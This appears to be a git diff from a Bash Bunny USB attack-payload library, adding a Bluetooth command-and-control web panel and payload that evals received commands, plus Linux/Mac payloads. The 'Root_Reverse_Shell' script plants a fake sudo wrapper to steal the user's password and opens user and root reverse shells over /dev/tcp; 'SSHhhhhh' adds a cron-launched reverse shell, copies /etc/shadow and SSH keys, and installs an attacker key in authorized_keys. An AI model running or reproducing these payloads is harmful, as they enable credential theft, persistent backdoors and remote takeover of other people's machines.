<h4 style="color: #ced4da;">Payload Script<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_payload')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Upload and execute a payload file</small></p></h4>
<div class="form">
<form hidden>
<div class="input-group mb-3">
<input type="file" accept=".txt" class="form-control" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" id="payloadFile">
</div>
<button class="btn" title="Execute Payload" onclick="execPayloadFile()">Execute Payload</button>
</form>
<form action="" method="POST" id="payloadForm">
<input type="hidden" name="mode" value="cmd">
<input type="hidden" name="query" value="" id="payloadContent">
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Attack Mode<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_attackmode')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Configure Ethernet, Storage, HID and Serial</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
<option value="ATTACKMODE OFF" selected>None</option>
<option value="ATTACKMODE SERIAL">SERIAL</option>
<option value="ATTACKMODE ECM_ETHERNET">ECM ETHERNET</option>
<option value="ATTACKMODE RNDIS_ETHERNET">RNDIS ETHERNET</option>
<option value="ATTACKMODE AUTO_ETHERNET">AUTO ETHERNET</option>
<option value="ATTACKMODE STORAGE">STORAGE</option>
<option value="ATTACKMODE HID">HID</option>
</select>
<input type="hidden" name="mode" value="cmd">
<button class="btn" type="submit">Update</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">LED <p class="text-dark-emphasis" style="font-size: 15px;"><small>Light up your Bush Bunny</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
<option value="LED G" selected>Green</option>
<option value="LED B">Blue</option>
<option value="LED R">Red</option>
<option value="LED Y">Yellow</option>
<option value="LED C">Cyan</option>
<option value="LED M">Magenta</option>
<option value="LED W">White</option>
</select>
<input type="hidden" name="mode" value="cmd">
<button class="btn" type="submit">Update</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">CPU Control <p class="text-dark-emphasis" style="font-size: 15px;"><small>Tune the CPU to your needs</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
<option value="CUCUMBER ENABLE">Single Core Ondemand (Low Power)</option>
<option value="CUCUMBER DISABLE" selected>Quad Core Ondemand (Default)</option>
<option value="CUCUMBER PLAID">Quad Core Performance (High Performance)</option>
</select>
<input type="hidden" name="mode" value="cmd">
<button class="btn" type="submit">Update</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Power Management<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_power')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Take a break</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #EC1A24; color: #adb5bd;" name="query">
<option value="shutdown -h now" selected>Shutdown</option>
<option value="reboot">Reboot</option>
</select>
<input type="hidden" name="mode" value="cmd">
<button class="btn btn-imp" type="submit">Initialize</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;" id="info_payload" hidden>
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Payload Script</h3>
<p>This section allows you to execute custom payload files.</p>
<p>The name of the uploaded file doesn't have to match <code>payload.txt</code>.</p>
<p>Uploaded payloads will be sent to your Bash Bunny and will be saved temporary. After finishing your payload, it gets removed automatically.
<div class="text-center" style="margin-top: 100px;">
<button class="btn" onclick="infoClose('info_payload')">Close</button>
</div>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;" id="info_attackmode" hidden>
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Attack Mode</h3>
<p>This section allows you to change the Bash Bunny's attack mode like the <code>ATTACKMODE</code> payload command does.</p>
<p>Further and more complex attack mode combinations can always be set from the "Payload One-Liner" or a payload file.</p>
<p class="fw-bold">Important:</p>
<p>When setting the attack mode, you likely can't change it without a reboot (besides disabling it again). The target machine may not recognize the change, for example, from STORAGE to HID. It may no longer detect the storage but won't be able to recognize the HID. Keep in mind: This can differ between target devices.</p>
<div class="text-center" style="margin-top: 100px;">
<button class="btn" onclick="infoClose('info_attackmode')">Close</button>
</div>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;" id="info_power" hidden>
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Power Management</h3>
<p>This section allows you to shutdown or reboot your Bash Bunny.</p>
<p>After reboot, your Bash Bunny will run the payload available at the current switch position.</p>
<p>Rebooting may help when you encouter execution issues. When the attacked device won't recognize attack mode changes, rebooting and then setting the new attack mode will fix it.</p>
<div class="text-center" style="margin-top: 100px;">
<button class="btn" onclick="infoClose('info_power')">Close</button>
</div>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;" id="info_cp" hidden>
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Copyright & Attribution</h3>
<br>
<img src="static/logo.png" style="height: 45px; padding-right: 15px; padding-bottom: 5px;" class="d-inline-block">
<p>BlueBunny is an open source project from <code><a href="https://github.com/90N45-d3v">90N45</a></code>.<br>It is licensed under the MIT license and should be treated as such.</p>
<br>
<img src="static/bb_icon_original.png" style="height: 45px; padding-right: 15px; padding-bottom: 5px;" class="d-inline-block">
<p>Bash Bunny is a trademark of Hak5 LLC.<br>Visit <code><a href="https://hak5.org">hak5.org</a></code> for more.</p>
<div class="text-center" style="margin-top: 100px;">
<button class="btn" onclick="infoClose('info_cp')">Close</button>
</div>
</div>
</div>
</div>
</div>
</body>
</html>

92
payloads/library/remote_access/BlueBunny/README.md Normal file
View File

@@ -0,0 +1,92 @@
![BlueBunny-Banner](https://github.com/90N45-d3v/BlueBunny/assets/79598596/fae0b5ca-6b38-41b3-a5fc-7aa3cabea369)
<p align="center">
<img src="https://img.shields.io/badge/Made%20with-Python-blue">
<img src="https://img.shields.io/github/license/90N45-d3v/BlueBunny.svg">
<img src="https://img.shields.io/badge/Ask%20me-anything-1abc9c.svg">
<br>
<img src="https://img.shields.io/badge/-Linux-lightblue">
</p>
<p align="center">
C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.<br>Send your Bash Bunny all the instructions it needs just over the air.
</p>
* Author: 90N45
* Version: 1.0
* Category: Remote
* Attackmodes: NONE (Custom)
## Table of contents
- [Overview](https://github.com/90N45-d3v/BlueBunny#overview)
- [Installation & Start](https://github.com/90N45-d3v/BlueBunny#installation--start)
- [Manual communication with the Bash Bunny through Python](https://github.com/90N45-d3v/BlueBunny#manual-communication-with-the-bash-bunny-through-python)
- [Troubleshooting](https://github.com/90N45-d3v/BlueBunny#troubleshooting)
- [Working on...](https://github.com/90N45-d3v/BlueBunny#working-on)
- [Additional information](https://github.com/90N45-d3v/BlueBunny#additional-information)
## Overview
#### Structure
![BlueBunny-Structure](https://github.com/90N45-d3v/BlueBunny/assets/79598596/3004fb10-feef-45c8-8624-1393c2fb7288)
## Installation & Start
1. Install required dependencies
````
pip install pygatt "pygatt[GATTTOOL]"
````
Make sure [BlueZ](http://www.bluez.org/download/) is installed and `gatttool` is usable
````
sudo apt install bluez
````
2. Download the `BlueBunny` folder and switch into the `BlueBunny/C2` folder
````
cd BlueBunny/C2
````
3. Start the C2 server
````
sudo python c2-server.py
````
4. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: `BlueBunny/payload.txt`).
5. Visit your C2 server from your browser on `localhost:1472` and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair).
## Manual communication with the Bash Bunny through Python
You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.
#### Example Code
````python
# Import the backend (BlueBunny/C2/BunnyLE.py)
import BunnyLE
# Define the data to send
data = "QUACK STRING I love my Bash Bunny"
# Define the type of the data to send ("cmd" or "payload") (payload data will be temporary written to a file, to execute multiple commands like in a payload script file)
d_type = "cmd"
# Initialize BunnyLE
BunnyLE.init()
# Connect to your Bash Bunny
bb = BunnyLE.connect()
# Send the data and let it execute
BunnyLE.send(bb, data, d_type)
````
## Troubleshooting
#### Connecting your Bash Bunny doesn't work? Try the following instructions:
- Try connecting a few more times
- Check if your bluetooth adapter is available
- Restart the system your C2 server is running on
- Check if your Bash Bunny is running the BlueBunny payload properly
- How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?
#### Bugs within BlueZ
The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kind of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and calm down if they show up.
- Timeout after 5.0 seconds
- Unknown error while scanning for BLE devices
## Working on...
- Remote shell access
- BLE exfiltration channel
- Improved connecting process
## Additional information
As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback.

63
payloads/library/remote_access/BlueBunny/payload.txt Normal file
View File

@@ -0,0 +1,63 @@
#!/bin/bash
#
# Title: BlueBunny
# Description: BLE based C2 server for the Bash Bunny Mark II
# Author: 90N45
# Version: 1.0
# Category: Remote
# Attackmodes: NONE (Custom)
LED SETUP
# Enable serial BLE module
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1
# Configure BLE module as slave
echo -n -e "AT+ROLE=0" > /dev/ttyS1
echo -n -e "AT+NAME=BlueBunny" > /dev/ttyS1
echo -n -e "AT+ADV=1" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1
LED FINISH
while [[ true ]]; do
# Get incomming data from serial port
data=$(head -1 /dev/ttyS1)
# Decode base64 encoded data
data=$(echo ${data} | base64 -d)
# Echo data for debugging
echo "Debugger: ${data}"
# Single command
if [[ $data =~ "<CMD>" ]]; then
# Extract command
command=${data#*<CMD>}
command=${command%%<CMD>*}
# Run recieved command
eval "${command}"
fi
# Payload file
if [[ $data =~ "<PAYLOAD>" ]]; then
# Set payload file name
file="BlueBunnyPayload-${RANDOM}.txt"
# Extract file content
content=${data#*<PAYLOAD>}
content=${content%%<PAYLOAD>*}
# Write content to file
printf "${content}" > "${file}";
# Run payload
bash $file
# Remove payload file
rm $file
fi
done

2
payloads/library/remote_access/PingZhellBunny/Bunny.pl
View File

@@ -15,7 +15,7 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by 0iphor13 for PingZhellBunny
# Modified by 0i41E for PingZhellBunny
#
#
#

2
payloads/library/remote_access/PingZhellBunny/README.md
View File

@@ -1,6 +1,6 @@
**Title: PingZhellBunny**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.5<br>

2
payloads/library/remote_access/PingZhellBunny/payload.txt
View File

@@ -2,7 +2,7 @@
#
# Title: PingZhellBunny
# Description: Getting remote access via ICMP
# Author: 0iphor13
# Author: 0i41E
# Version: 1.5
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET

4
payloads/library/remote_access/ReverseBunny/README.md
View File

@@ -1,6 +1,6 @@
**Title: ReverseBunny**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.5<br>
@@ -8,7 +8,7 @@ Version: 1.5<br>
<p>!Getting remote access via obfuscated reverse shell!<br>
Upload payload.txt and RevBunny.ps1 onto your Bunny
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)
Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )</p>

2
payloads/library/remote_access/ReverseBunny/payload.txt
View File

@@ -2,7 +2,7 @@
#
# Title: ReverseBunny
# Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0iphor13
# Author: 0i41E
# Version: 1.5
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET

6
payloads/library/remote_access/ReverseBunnySSL/README.md
View File

@@ -1,6 +1,6 @@
**Title: ReverseBunnySSL**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.2<br>
For input and inspiration - Thanks to: Cribbit, sebkinne</p>
@@ -26,5 +26,5 @@ I recommend openssl itself or ncat - Example syntax for both:<br>
**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)

2
payloads/library/remote_access/ReverseBunnySSL/payload.txt
View File

@@ -2,7 +2,7 @@
#
# Title: ReverseBunnySSL
# Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0iphor13
# Author: 0i41E
# Version: 1.2
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET

15
payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md Normal file
View File

@@ -0,0 +1,15 @@
# Root_Reverse_Shell_linux_mac
### Since i dont have a bash bunny this is tested in digispark
### I have converted this script to bash bunny
### If any issues put in discussion i will fix it
POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
### Special thanks to sudobackdoor for bash script sample
Dont forget to change IP in payload.sh.<br/>
Before using this payload don't forget to start netcat listeners on port 4444 and 1337.<br/>
It reverse connects user shell in port 4444 and root shell in port 1337.<br/>
Make sure switch is in position 1.<br/>
Once the payload.sh is executed the sudobackdoor script it will gets the root credential and It will be used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also.
The reason for two netcat connection is user level connection established when script is executed. But to obtain root credential is required, So it waits for user to elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established.

59
payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh Normal file
View File

@@ -0,0 +1,59 @@
#!/bin/bash
LISTENER_IP="127.0.0.1"
LISTENER1_PORT="1337" #Listener for root shell
LISTENER2_PORT="4444" #Listener for user shell
if [ ! -d ~/.config/sudo ]
then
mkdir -p ~/.config/sudo
fi
if [ -f ~/.config/sudo/sudo ]
then
rm ~/.config/sudo/sudo
fi
echo '#!'$SHELL >> ~/.config/sudo/sudo
cat <<'EOF' >> ~/.config/sudo/sudo
/usr/bin/sudo -n true 2>/dev/null
if [ $? -eq 0 ]
then
/usr/bin/sudo $@
else
echo -n "[sudo] password for $USER: "
read -s pwd
echo
echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
if [ $? -eq 1 ]
then
echo "Sorry, try again."
sudo $@
else
/usr/bin/sudo -S $@
if [ -f ~/.bash_profile ]
then
rm ~/.bash_profile
mv ~/.bash_profile.bak ~/.bash_profile
else
rm ~/.bashrc
mv ~/.bashrc.bak ~/.bashrc
fi
rm ~/.config/sudo/sudo
echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/$LISTENER_IP/$LISTENER1_PORT 0<&1 2>&1) &
fi
fi
EOF
chmod u+x ~/.config/sudo/sudo
if [ -f ~/.bash_profile ]
then
cp ~/.bash_profile ~/.bash_profile.bak
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
else
cp ~/.bashrc ~/.bashrc.bak
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
fi
disown !$ $(/bin/bash -i > /dev/tcp/$LISTENER_IP/$LISTENER2_PORT 0<&1 2>&1) &
bash

50
payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt Normal file
View File

@@ -0,0 +1,50 @@
# Title: Linux/Mac Reverse Shell
# Author: Darkprince (Sridhar)
# Version: 1.0
#
# Runs a script in the background that provides a user shell initially and waits for the user to escalate privileges, then provides a root reverse shell.
# Magenta..................Setup
# Red, Green, Blue.........Executing
# Green....................Finished
# INITIALIZING
LED W
# Mac keyboard works in Linux and Mac
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
LANGUAGE='us'
# Ensure the switch position is 1
# Delay for HID device recognition
Q DELAY 1000
# ATTACKING
LED R G B
# Get Linux/Mac Terminal
RUN UNITY xterm
Q DELAY 1000
# To close the opened window by the Linux run command
Q GUI Q
Q CTRL C
RUN OSX terminal
Q DELAY 1000
# If Linux, then clearing 'terminal' which is typed by Mac run script
Q CTRL C
# Execute bash script which is the same for Mac and Linux
GET SWITCH_POSITION
Q STRING bash /Volumes/BashBunny/payloads/$SWITCH_POSITION/payload.sh
# The cleanup process will be handled by the bash script
# Closing the xterm in Linux
# Closing the terminal in Mac, even if the terminal has other processes COMMAND Q and ENTER keys will terminate the terminal
Q GUI Q
Q CTRL C
Q STRING exit
Q ENTER
LED G

48
payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh Normal file
View File

@@ -0,0 +1,48 @@
#!/bin/bash
# Main Payload
# Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc..
RSA_KEY='PLACEHOLDER-FOR-RSA-PUBLIC-KEY' # replace with the contents of ~/.ssh/id_rsa.pub or whatever your RSA public key file is named
REVERSESHELL=true
LHOST='10.20.20.104' # Reverse Shell listening host IP
LPORT='4444' # Reverse Shell listening host port
CRON='30 */1 * * *' # Just the timing portion of the CRON job
ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces
DT=$(date "+%Y.%m.%d-%H.%M.%S")
DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT
if [ "$REVERSESHELL" = true ] ; then
# Create reverse shell script
echo "#!/bin/bash"> .config/rs.sh ;
echo "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1">> .config/rs.sh ;
chmod +x /home/$USER/.config/rs.sh ;
# Add task to CRON that launches the Reverse_TCP script on a schedule for persistence
crontab -l > crontab.tmp ;
if grep -Fq .config/rs.sh crontab.tmp; then
echo 'Update in progress.'
else
echo "$CRON /home/$USER/.config/rs.sh" >> crontab.tmp ;
crontab crontab.tmp ;
fi
rm -f crontab.tmp ;
fi
# Smash & Grab the loot!! (Get what you can now and work on PrivEsc later)
mkdir $DN ;
ip addr > $DN/ip-addr.txt ;
whoami > $DN/whoami.txt ;
cat /proc/net/arp > $DN/arp.txt ;
cat /etc/passwd > $DN/etc-passwd.txt ;
cat /etc/shadow > $DN/etc-shadow.txt ;
uname -a > $DN/uname-a.txt ;
route -n > $DN/route-n.txt ;
cp /home/$USER/.ssh/* $DN/. ;
# Add Attacker's RSA key to .ssh/authorized_keys for additional persistence
if grep -Fq $ATTACKER_HOST .ssh/authorized_keys ; then
echo 'Update almost completed.'
else
echo $RSA_KEY >> .ssh/authorized_keys ;
fi

54
payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt Normal file
View File

@@ -0,0 +1,54 @@
# Title: SSHhhhhh
# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors
# Author: WWVB
# Props: Hak5Darren, hak5peaks
# Version: 1.1
# Category: Exfiltration w/Persistence
# Target: Linux Ubuntu 18.04 LTS
# Attackmodes: HID, Storage
DRIVE_LABEL="BashBunny"
#!/bin/bash
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LED STAGE1
QUACK DELAY 500
QUACK CTRL-ALT t
QUACK DELAY 100
# Drop primary payload on the box
QUACK STRING cp /media/\$USER/$DRIVE_LABEL/payloads/$SWITCH_POSITION/boom.sh .
QUACK ENTER
QUACK DELAY 50
QUACK STRING chmod +x boom.sh
QUACK ENTER
QUACK DELAY 50
LED ATTACK
# Light the fuse and wait!!
QUACK STRING ./boom.sh
QUACK ENTER
QUACK DELAY 1000
# Cleanup
LED CLEANUP
QUACK STRING rm boom.sh
QUACK ENTER
QUACK DELAY 100
# Bye Felicia!
QUACK STRING umount '/media/$USER/$DRIVE_LABEL'
QUACK ENTER
QUACK DELAY 25
QUACK STRING exit
QUACK ENTER
QUACK DELAY 25
LED FINISH

32
payloads/library/remote_access/SSHhhhhh-(Linux)/readme.md Normal file
View File

@@ -0,0 +1,32 @@
# SSHhhhhh
## Author: WWVB
## Version: Version 1.0
## Description
## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS)
Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [nothing major])
## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..)
whoami
ip addr
arp data
route -n
/etc/passwd
/etc/shadow (on the off chance you get a root terminal)
uname -a
## Two opportunites for persistence are injected:
Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You)
Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later)
## Configuration = HID STORAGE